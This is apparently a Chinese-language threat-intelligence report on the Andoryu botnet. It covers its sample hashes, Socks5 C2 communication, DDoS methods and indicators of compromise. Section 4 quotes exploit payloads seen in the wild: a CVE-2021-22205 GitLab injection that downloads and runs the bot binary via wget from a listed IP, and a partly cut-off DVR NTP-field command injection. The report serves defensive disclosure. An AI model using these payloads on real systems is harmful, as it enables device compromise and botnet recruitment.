1. 概述
通过样本编写者对其僵尸网络的命名,我们将此新型僵尸网络称为Andoryu Botnet,该新型僵尸网络通过Socks5协议与C2进行通信。
Andoryu Botnet 最近传播趋势如下,通过其活跃时间点我们得知Andoryu Botnet当前仅在样本进行更新迭代的时间点前后进行小范围传播,因此可以判断该僵尸网络还处于测试阶段:
2. 样本关键行为分析
文件名 | 文件大小 | 文件MD5 |
Andoryu.x86 | 42208 bytes | D203E1BB0BA3E8385FF9E1F83C10EB2D |
2.1 运行参数判定
运行时会首先判断是否存在参数,当存有一个参数时样本才会正常运行:
2.2 字符串加密
样本中的大部分关键字符串加密,运行前期通过一个函数对所有加密的字符串进行批量解密:
2.3 进程名伪装
2.4 打印僵尸网络信息
解密后的字符串中存在该僵尸网络信息,样本运行时将其打印到控制台:
由此命名该僵尸网络为Andoryu Botnet,并且可以了解到编写者测试样本的时间为2022年12月30日。
3. Socks5通信
3.1 通信过程
该僵尸网络通过socks协议进行通信,具体通信过程如下:
一、首先连接硬编码的代理服务器,代理服务器地址为 "152.67.66.37:1080"。
二、与代理服务器成功三次握手后进行socks认证。
三、告知代理服务器需要访问哪个远程服务器,远程服务器地址批量解密时获取,DST_C2 = "172.86.123.20:1025"。
四、socks通信,发送上线包。
五、通过代理接收C2下发指令。
后续我们将持续对Andoryu Botnet进行跟踪并公布其最新动态。
3.2 DDoS方法
Name | Description |
icmp-echo | ICMP Flood |
udp-ovh | UDP Flood for OVH |
udp-game | UDP Game Flood |
udp-plain | UDP Plain Flood |
tcp-raw | TCP Flood |
tcp-socket | TCP Syn Flood |
tcp-handshake | TCP Flood |
4. 样本更新及传播
Arm
Mips
M68K
SuperH
Sparc
x86
CVE-2021-22205:
P(metadata
.(Copyright "\" . qx{TF=$(mktemp -u);mkfifo $TF && rm -rf Andoryu.10wget;wget http://47.87.154.192/Andoryu.x86 -O Andoryu.10wget;chmod 777 Andoryu.10wget;./Andoryu.10wget gitlab.x86;rm -rf Andoryu.10wget;<$TF | sh 1>$TF} . \" b ") )
User-Agent: Abcd
<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><SetConfiguration File="service.xml"><![CDATA[<?xml version="1.0" encoding="UTF-8"?><DVR Platform="Hi3520"><Service><NTP Enable="True" Interval="20000" Server="time.nist.gov&cd /tmp;wget -O-
5. IoCs
MD5:
D203E1BB0BA3E8385FF9E1F83C10EB2D
28F10E60D05018E6D28B79F0976A8542
F9018E4401116435DCFE2DC9D14D0FD5
2BABAF24B23872749EEC1452D7E7C0F3
ABD2496C3B703BD722386A848CC0BC12
6335ECB85ED6C6FCCF71FD841939BEC4
70A568C47785A8C58AA1D755EFE0E39E
FFE05160D769F441EF4A67271F9E614C
BB7DECCC2F6CEB2D5A5C7F5A05A4BBB1
0A1B14C2B8A453323841431FA44D0E32
C9CE8E0A1B13CBB6719133AFE5988CA7
C&C:
152.67.66.37:1080
172.86.123.20: 1025
104.234.239.190:1025
点击阅读原文至ALPHA 6.0
即刻助力威胁研判